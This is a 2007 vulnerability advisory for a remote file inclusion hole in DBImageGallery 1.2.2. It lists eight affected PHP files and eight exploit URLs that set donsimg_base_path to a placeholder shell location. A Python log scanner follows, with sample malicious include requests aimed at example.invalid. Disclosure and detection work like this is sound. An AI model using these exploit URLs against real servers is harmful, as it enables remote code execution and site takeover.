From: RaeD Hasadya <raed_(at)_bsdmail.com>
Date: 03.03.2007
Subject: Remote File Include In DBImageGallery

Remote File Include In DBImageGallery 1.2.2

Discovered By : Hasadya Raed
Contact Me : RaeD@BsdMail.Com
Download Script : http://www.dbscripts.net/download/?file=1

B.Files:

admin/attributes.php -> require_once $donsimg_base_path
admin/images.php -> require_once $donsimg_base_path
admin/scan.php -> require_once $donsimg_base_path
includes/attributes.php -> require_once $donsimg_base_path
includes/db_utils.php -> require_once $donsimg_base_path
includes/images.php -> require_once $donsimg_base_path
includes/utils.php -> require_once $donsimg_base_path
includes/values.php -> require_once $donsimg_base_path

Exploits :

http://www.victim.com/path/admin/attributes.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/admin/images.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/admin/scan.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/includes/attributes.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/includes/db_utils.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/includes/images.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/includes/utils.php?donsimg_base_path=[Shell-Attack]
http://www.victim.com/path/includes/values.php?donsimg_base_path=[Shell-Attack]
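
A log check for the requests this advisory describes, as an added example that is not part of the original post: it flags hits on the eight listed scripts that carry a donsimg_base_path query parameter, and marks those whose value is a URL rather than a local path. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script paths and parameter name as listed in the advisory.
AFFECTED = (
    "admin/attributes.php", "admin/images.php", "admin/scan.php",
    "includes/attributes.php", "includes/db_utils.php", "includes/images.php",
    "includes/utils.php", "includes/values.php",
)
PARAM = "donsimg_base_path"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value points at a URL, stream wrapper or UNC share instead of a local path.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:|//|\\\\)", re.I)

def classify(line):
    """Return None, 'param-override' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    path = unquote(url.path).lower()
    if not path.endswith(tuple("/" + s for s in AFFECTED)):
        return None
    # parse_qs percent-decodes names and values, so encoded variants match too.
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    if any(REMOTE_RE.match(v) for v in values):
        return "remote-include"
    return "param-override"

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample entries (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Mar/2007:10:00:01 +0000] "GET /gallery/admin/scan.php?donsimg_base_path=http://example.invalid/x.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [03/Mar/2007:10:00:02 +0000] "GET /gallery/includes/utils.php?donsimg%5Fbase%5Fpath=%68ttp%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 512',
    '203.0.113.9 - - [03/Mar/2007:10:00:03 +0000] "GET /gallery/includes/values.php?donsimg_base_path=../ HTTP/1.1" 200 90',
    '203.0.113.9 - - [03/Mar/2007:10:00:04 +0000] "GET /gallery/index.php?page=2 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(n, verdict)
```

Any hit is worth reviewing, since none of these scripts should receive donsimg_base_path from a client; only the query string is inspected, so values sent in a POST body or cookie are outside this check.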